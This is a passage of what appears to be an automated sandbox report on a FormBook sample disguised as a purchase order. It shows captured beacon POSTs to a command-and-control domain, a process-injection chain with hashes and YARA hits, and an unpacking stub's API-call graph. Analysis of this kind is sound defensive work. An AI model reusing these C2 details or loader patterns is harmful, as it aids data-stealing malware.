                                                                                                            Origin: http://www.54248711.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.54248711.xyz/jm2l/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 32 6b 6b 34 39 36 53 59 56 50 76 45 79 78 73 63 41 48 39 4c 5a 34 63 33 57 4f 77 6c 54 55 4b 38 4f 64 53 41 6e 71 67 3d
                                                                                                            Data Ascii: cla=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd2kk496SYVPvEyxscAH9LZ4c3WOwlTUK8OdSAnqg=
                                                                                                            Nov 22, 2024 07:57:48.796672106 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:48 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                            Nov 22, 2024 07:57:48.796721935 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            38192.168.2.550015161.97.142.14480
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:50.447796106 CET624OUTPOST /jm2l/ HTTP/1.1
                                                                                                            Host: www.54248711.xyz
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.54248711.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.54248711.xyz/jm2l/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 77 50 47 64 34 53 43 6b 72 56 55 2b 43 77 35 39 32 37 30 4d 34 56 72 53 52 6c 59 44 48 52 35 52 4f 33 6d 73 73 5a
                                                                                                            Data Ascii: cla=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYwPGd4SCkrVU+Cw59270M4VrSRlYDHR5RO3mssZ
                                                                                                            Nov 22, 2024 07:57:51.769519091 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:51 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                            Nov 22, 2024 07:57:51.769551992 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:01:54:42
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Users\user\Desktop\PO #2411071822.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\PO #2411071822.exe"
                                                                                                            Imagebase:0x3e0000
                                                                                                            File size:1'213'440 bytes
                                                                                                            MD5 hash:564780E97B7357CA98FC62DB3DF63809
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:01:54:44
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\PO #2411071822.exe"
                                                                                                            Imagebase:0x460000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:01:54:46
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe"
                                                                                                            Imagebase:0x170000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:01:54:48
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                            Imagebase:0xc60000
                                                                                                            File size:135'680 bytes
                                                                                                            MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:01:55:02
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe"
                                                                                                            Imagebase:0x170000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:01:55:14
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:3.1%
                                                                                                              Dynamic/Decrypted Code Coverage:1.9%
                                                                                                              Signature Coverage:8.4%
                                                                                                              Total number of Nodes:1764
                                                                                                              Total number of Limit Nodes:154
                                                                                                              execution_graph 93158 42bb64 93159 42bb71 93158->93159 93160 42bb77 93158->93160 93166 401c9d 93159->93166 93162 42bb88 93160->93162 93163 401c9d _free 47 API calls 93160->93163 93164 42bb9a 93162->93164 93165 401c9d _free 47 API calls 93162->93165 93163->93162 93165->93164 93167 401ccf __dosmaperr 93166->93167 93168 401ca6 RtlFreeHeap 93166->93168 93167->93160 93168->93167 93169 401cbb 93168->93169 93172 407c0e 47 API calls __getptd_noexit 93169->93172 93171 401cc1 GetLastError 93171->93167 93172->93171 93173 d78350 93174 d78438 93173->93174 93186 d78240 93174->93186 93176 d78461 CreateFileW 93178 d784b5 93176->93178 93179 d784b0 93176->93179 93178->93179 93180 d784cc VirtualAlloc 93178->93180 93180->93179 93181 d784ea ReadFile 93180->93181 93181->93179 93182 d78505 93181->93182 93183 d77240 12 API calls 93182->93183 93184 d78538 93183->93184 93185 d7855b ExitProcess 93184->93185 93185->93179 93187 d78249 Sleep 93186->93187 93188 d78257 93187->93188 93189 4519dd 93194 3e4a30 93189->93194 93191 4519f1 93214 400f0a 52 API calls __cinit 93191->93214 93193 4519fb 93195 3e4a40 __ftell_nolock 93194->93195 93215 3ed7f7 93195->93215 93199 3e4aff 93227 3e363c 93199->93227 93206 3ed7f7 48 API calls 93207 3e4b32 93206->93207 93249 3e49fb 93207->93249 93209 3e4b43 Mailbox 93209->93191 93210 3e61a6 48 API calls 93213 3e4b3d _wcscat Mailbox __NMSG_WRITE 93210->93213 93212 3e64cf 48 API calls 93212->93213 93213->93209 93213->93210 93213->93212 93263 3ece19 93213->93263 93214->93193 93269 3ff4ea 93215->93269 93217 3ed818 93218 3ff4ea 48 API calls 93217->93218 93219 3e4af6 93218->93219 93220 3e5374 93219->93220 93300 40f8a0 93220->93300 93223 3ece19 48 API calls 93224 3e53a7 93223->93224 93302 3e660f 93224->93302 93226 3e53b1 Mailbox 93226->93199 93228 3e3649 __ftell_nolock 93227->93228 93347 3e366c GetFullPathNameW 93228->93347 93230 3e365a 93231 3e6a63 48 API calls 93230->93231 93232 3e3669 93231->93232 93233 3e518c 93232->93233 93234 3e5197 93233->93234 93235 3e519f 93234->93235 93236 451ace 93234->93236 93349 3e5130 93235->93349 93359 3e6b4a 48 API calls 93236->93359 93239 3e4b18 93243 3e64cf 93239->93243 93240 451adb __NMSG_WRITE 93241 3fee75 48 API calls 93240->93241 93242 451b07 ___crtGetEnvironmentStringsW 93241->93242 93244 3e651b 93243->93244 93248 3e64dd ___crtGetEnvironmentStringsW 93243->93248 93246 3ff4ea 48 API calls 93244->93246 93245 3ff4ea 48 API calls 93247 3e4b29 93245->93247 93246->93248 93247->93206 93248->93245 93366 3ebcce 93249->93366 93252 3e4a2b 93252->93213 93253 4541cc RegQueryValueExW 93254 4541e5 93253->93254 93255 454246 RegCloseKey 93253->93255 93256 3ff4ea 48 API calls 93254->93256 93257 4541fe 93256->93257 93372 3e47b7 93257->93372 93260 454224 93261 3e6a63 48 API calls 93260->93261 93262 45423b 93261->93262 93262->93255 93264 3ece28 __NMSG_WRITE 93263->93264 93265 3fee75 48 API calls 93264->93265 93266 3ece50 ___crtGetEnvironmentStringsW 93265->93266 93267 3ff4ea 48 API calls 93266->93267 93268 3ece66 93267->93268 93268->93213 93272 3ff4f2 __calloc_impl 93269->93272 93271 3ff50c 93271->93217 93272->93271 93273 3ff50e std::exception::exception 93272->93273 93278 40395c 93272->93278 93292 406805 RaiseException 93273->93292 93275 3ff538 93293 40673b 47 API calls _free 93275->93293 93277 3ff54a 93277->93217 93279 4039d7 __calloc_impl 93278->93279 93285 403968 __calloc_impl 93278->93285 93299 407c0e 47 API calls __getptd_noexit 93279->93299 93282 40399b RtlAllocateHeap 93282->93285 93291 4039cf 93282->93291 93284 4039c3 93297 407c0e 47 API calls __getptd_noexit 93284->93297 93285->93282 93285->93284 93286 403973 93285->93286 93289 4039c1 93285->93289 93286->93285 93294 4081c2 47 API calls __NMSG_WRITE 93286->93294 93295 40821f 47 API calls 5 library calls 93286->93295 93296 401145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93286->93296 93298 407c0e 47 API calls __getptd_noexit 93289->93298 93291->93272 93292->93275 93293->93277 93294->93286 93295->93286 93297->93289 93298->93291 93299->93291 93301 3e5381 GetModuleFileNameW 93300->93301 93301->93223 93303 40f8a0 __ftell_nolock 93302->93303 93304 3e661c GetFullPathNameW 93303->93304 93309 3e6a63 93304->93309 93306 3e6643 93320 3e6571 93306->93320 93310 3e6adf 93309->93310 93312 3e6a6f __NMSG_WRITE 93309->93312 93335 3eb18b 93310->93335 93313 3e6a8b 93312->93313 93314 3e6ad7 93312->93314 93324 3e6b4a 48 API calls 93313->93324 93334 3ec369 48 API calls 93314->93334 93317 3e6a95 93325 3fee75 93317->93325 93319 3e6ab6 ___crtGetEnvironmentStringsW 93319->93306 93321 3e657f 93320->93321 93322 3eb18b 48 API calls 93321->93322 93323 3e658f 93322->93323 93323->93226 93324->93317 93327 3ff4ea __calloc_impl 93325->93327 93326 40395c std::exception::_Copy_str 47 API calls 93326->93327 93327->93326 93328 3ff50c 93327->93328 93329 3ff50e std::exception::exception 93327->93329 93328->93319 93339 406805 RaiseException 93329->93339 93331 3ff538 93340 40673b 47 API calls _free 93331->93340 93333 3ff54a 93333->93319 93334->93319 93336 3eb1a2 ___crtGetEnvironmentStringsW 93335->93336 93337 3eb199 93335->93337 93336->93319 93337->93336 93341 3ebdfa 93337->93341 93339->93331 93340->93333 93342 3ebe0d 93341->93342 93346 3ebe0a ___crtGetEnvironmentStringsW 93341->93346 93343 3ff4ea 48 API calls 93342->93343 93344 3ebe17 93343->93344 93345 3fee75 48 API calls 93344->93345 93345->93346 93346->93336 93348 3e368a 93347->93348 93348->93230 93350 3e513f __NMSG_WRITE 93349->93350 93351 451b27 93350->93351 93352 3e5151 93350->93352 93365 3e6b4a 48 API calls 93351->93365 93360 3ebb85 93352->93360 93355 3e515e ___crtGetEnvironmentStringsW 93355->93239 93356 451b34 93357 3fee75 48 API calls 93356->93357 93358 451b57 ___crtGetEnvironmentStringsW 93357->93358 93359->93240 93361 3ebb9b 93360->93361 93364 3ebb96 ___crtGetEnvironmentStringsW 93360->93364 93362 3fee75 48 API calls 93361->93362 93363 451b77 93361->93363 93362->93364 93364->93355 93365->93356 93367 3e4a0a RegOpenKeyExW 93366->93367 93368 3ebce8 93366->93368 93367->93252 93367->93253 93369 3ff4ea 48 API calls 93368->93369 93370 3ebcf2 93369->93370 93371 3fee75 48 API calls 93370->93371 93371->93367 93373 3ff4ea 48 API calls 93372->93373 93374 3e47c9 RegQueryValueExW 93373->93374 93374->93260 93374->93262 93375 d788fb 93376 d78902 93375->93376 93377 d789a0 93376->93377 93378 d7890a 93376->93378 93394 d79250 8 API calls 93377->93394 93382 d785b0 93378->93382 93381 d78987 93385 d7864f 93382->93385 93384 d78680 CreateFileW 93384->93385 93387 d7868d 93384->93387 93386 d786a9 VirtualAlloc 93385->93386 93385->93387 93392 d787b0 CloseHandle 93385->93392 93393 d787c0 VirtualFree 93385->93393 93395 d794c0 GetPEB 93385->93395 93386->93387 93388 d786ca ReadFile 93386->93388 93390 d7889c VirtualFree 93387->93390 93391 d788aa 93387->93391 93388->93387 93389 d786e8 VirtualAlloc 93388->93389 93389->93385 93389->93387 93390->93391 93391->93381 93392->93385 93393->93385 93394->93381 93396 d794ea 93395->93396 93396->93384 93397 3e3742 93398 3e374b 93397->93398 93399 3e37c8 93398->93399 93400 3e3769 93398->93400 93437 3e37c6 93398->93437 93402 3e37ce 93399->93402 93403 451e00 93399->93403 93404 3e382c PostQuitMessage 93400->93404 93405 3e3776 93400->93405 93401 3e37ab DefWindowProcW 93408 3e37b9 93401->93408 93409 3e37f6 SetTimer RegisterWindowMessageW 93402->93409 93410 3e37d3 93402->93410 93446 3e2ff6 16 API calls 93403->93446 93404->93408 93406 451e88 93405->93406 93407 3e3781 93405->93407 93452 424ddd 60 API calls _memset 93406->93452 93413 3e3789 93407->93413 93414 3e3836 93407->93414 93409->93408 93415 3e381f CreatePopupMenu 93409->93415 93417 3e37da KillTimer 93410->93417 93418 451da3 93410->93418 93412 451e27 93447 3fe312 346 API calls Mailbox 93412->93447 93420 451e6d 93413->93420 93421 3e3794 93413->93421 93444 3feb83 53 API calls _memset 93414->93444 93415->93408 93442 3e3847 Shell_NotifyIconW _memset 93417->93442 93424 451ddc MoveWindow 93418->93424 93425 451da8 93418->93425 93420->93401 93451 41a5f3 48 API calls 93420->93451 93427 3e379f 93421->93427 93428 451e58 93421->93428 93422 451e9a 93422->93401 93422->93408 93424->93408 93430 451dac 93425->93430 93431 451dcb SetFocus 93425->93431 93427->93401 93448 3e3847 Shell_NotifyIconW _memset 93427->93448 93450 4255bd 70 API calls _memset 93428->93450 93429 3e3845 93429->93408 93430->93427 93433 451db5 93430->93433 93431->93408 93432 3e37ed 93443 3e390f DeleteObject DestroyWindow Mailbox 93432->93443 93445 3e2ff6 16 API calls 93433->93445 93437->93401 93440 451e4c 93449 3e4ffc 67 API calls _memset 93440->93449 93442->93432 93443->93408 93444->93429 93445->93408 93446->93412 93447->93427 93448->93440 93449->93437 93450->93429 93451->93437 93452->93422 93453 458eb8 93457 42a635 93453->93457 93455 458ec3 93456 42a635 84 API calls 93455->93456 93456->93455 93463 42a66f 93457->93463 93465 42a642 93457->93465 93458 42a671 93498 3fec4e 81 API calls 93458->93498 93460 42a676 93468 3e936c 93460->93468 93462 42a67d 93488 3e510d 93462->93488 93463->93455 93465->93458 93465->93460 93465->93463 93466 42a669 93465->93466 93497 3f4525 61 API calls ___crtGetEnvironmentStringsW 93466->93497 93469 3e9384 93468->93469 93486 3e9380 93468->93486 93470 454cbd __i64tow 93469->93470 93471 3e9398 93469->93471 93472 454bbf 93469->93472 93477 3e93b0 __itow Mailbox _wcscpy 93469->93477 93499 40172b 80 API calls 3 library calls 93471->93499 93473 454ca5 93472->93473 93478 454bc8 93472->93478 93500 40172b 80 API calls 3 library calls 93473->93500 93476 3ff4ea 48 API calls 93479 3e93ba 93476->93479 93477->93476 93478->93477 93480 454be7 93478->93480 93482 3ece19 48 API calls 93479->93482 93479->93486 93481 3ff4ea 48 API calls 93480->93481 93483 454c04 93481->93483 93482->93486 93484 3ff4ea 48 API calls 93483->93484 93485 454c2a 93484->93485 93485->93486 93487 3ece19 48 API calls 93485->93487 93486->93462 93487->93486 93489 3e511f 93488->93489 93490 451be7 93488->93490 93501 3eb384 93489->93501 93510 41a58f 48 API calls ___crtGetEnvironmentStringsW 93490->93510 93493 3e512b 93493->93463 93494 451bf1 93511 3e6eed 93494->93511 93496 451bf9 Mailbox 93497->93463 93498->93460 93499->93477 93500->93477 93502 3eb392 93501->93502 93503 3eb3c5 ___crtGetEnvironmentStringsW 93501->93503 93502->93503 93504 3eb3fd 93502->93504 93505 3eb3b8 93502->93505 93503->93493 93503->93503 93507 3ff4ea 48 API calls 93504->93507 93506 3ebb85 48 API calls 93505->93506 93506->93503 93508 3eb407 93507->93508 93509 3ff4ea 48 API calls 93508->93509 93509->93503 93510->93494 93512 3e6ef8 93511->93512 93513 3e6f00 93511->93513 93515 3edd47 48 API calls ___crtGetEnvironmentStringsW 93512->93515 93513->93496 93515->93513 93516 405dfd 93517 405e09 _raise 93516->93517 93553 407eeb GetStartupInfoW 93517->93553 93520 405e0e 93555 409ca7 GetProcessHeap 93520->93555 93521 405e66 93522 405e71 93521->93522 93640 405f4d 47 API calls 3 library calls 93521->93640 93556 407b47 93522->93556 93525 405e77 93526 405e82 __RTC_Initialize 93525->93526 93641 405f4d 47 API calls 3 library calls 93525->93641 93577 40acb3 93526->93577 93529 405e91 93530 405e9d GetCommandLineW 93529->93530 93642 405f4d 47 API calls 3 library calls 93529->93642 93596 412e7d GetEnvironmentStringsW 93530->93596 93533 405e9c 93533->93530 93537 405ec2 93609 412cb4 93537->93609 93540 405ec8 93543 405ed3 93540->93543 93644 40115b 47 API calls 3 library calls 93540->93644 93623 401195 93543->93623 93544 405edb 93545 405ee6 __wwincmdln 93544->93545 93645 40115b 47 API calls 3 library calls 93544->93645 93627 3e3a0f 93545->93627 93548 405efa 93549 405f09 93548->93549 93646 4013f1 47 API calls _doexit 93548->93646 93647 401186 47 API calls 